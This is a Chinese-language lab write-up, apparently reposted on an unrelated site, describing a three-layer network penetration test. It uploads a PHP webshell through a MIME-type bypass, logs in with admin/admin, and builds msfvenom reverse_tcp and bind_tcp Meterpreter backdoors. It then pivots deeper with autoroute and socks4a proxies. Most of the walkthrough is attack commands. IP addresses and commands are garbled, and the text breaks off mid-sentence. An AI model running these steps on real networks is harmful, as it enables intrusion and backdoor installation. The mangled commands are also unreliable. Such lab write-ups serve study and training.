藏獒介绍

首页 » 常识 » 常识 » 三层网络渗透测试实验必须收藏
TUhjnbcbe - 2022/5/27 12:55:00
声明:此次渗透环境为实验环境,仅供渗透实验学校参考前言在渗透测试过程中我们会遇到很多不同的网络情况,或许普通的内网渗透我们已经很熟练了,但在现实环境中或许会有多层网络结构,如果遇到多层网络结构我们应该如何进行渗透呢?利用这个实验我们就可以更清晰的了解多层网络渗透测试的过程。并了解通过msf进行内网渗透,由一级代理到二级代理的搭建来进行对三层网络的渗透的过程。目标ip:19..31.07访问目标ip发现是一个文件上传页面

经测试可通过文件类型MIME绕过进行上传php脚本,上传成功后返回路径

访问返回的文件路径,成功连接到php大马

查看ip发现该主机是双网卡,第二层网络段为19..1.0/4

为进一步进行内网渗透,我们上传msf后门后门制作:

1.msfvenom-plinux/x64/meterpreter/reverse_tcpLHOST=19..31.07LPORT=SessionCommunicationTimeout=0SessionExpirationTimeout=0-felfshell.elf

将后门上传到第一层主机19..31.07

设置msf监听

在第一层主机上运行shell.elf

Chmodshell.elf./shell.elf

msf获得meterpreter

将第一层的meterpreter切换到后台运行

1.background

利用第一层的meterpreter添加第二层的路由

1.runautoroute-s19..1.0/4

扫描发现第二层主机ip为19..1.

接着利用msf搭建socks代理,好让攻击机直接打第二层网络:

1.useauxiliary/server/socks4a

设置好代理后访问19..1.成功访问到网站

利用弱口令admin/admin登录到后台

在设置处发现可修改允许上传文件的类型,修改后保存设置

在撰写新文章处添加附件可直接上传php脚本

成功连接到php大马

为了打开第三层,我们需要在第二层主机上传msf后门制作后门:

msfvenom-plinux/x86/meterpreter/bind_tcpLPORT=-felfding.elf

利用大马上传,并在第二层主机上运行

chmodding.elf./ding.elf

设置msf相关配置

成功获取到第二层主机meterpreter

查看ip发现第三层网段为19...0/4

利用第二层主机的meterpreter添加第三层的网络路由

启用一个socks4a代理给第三层网络,端口设置为

然后在配置文件中加上

1.socks..31.119

利用获得的meterpreter发现第三层目标主机为19.16..

使用代理打开Firefox访问第三层主机ip19...

通过测试发现

1
查看完整版本: 三层网络渗透测试实验必须收藏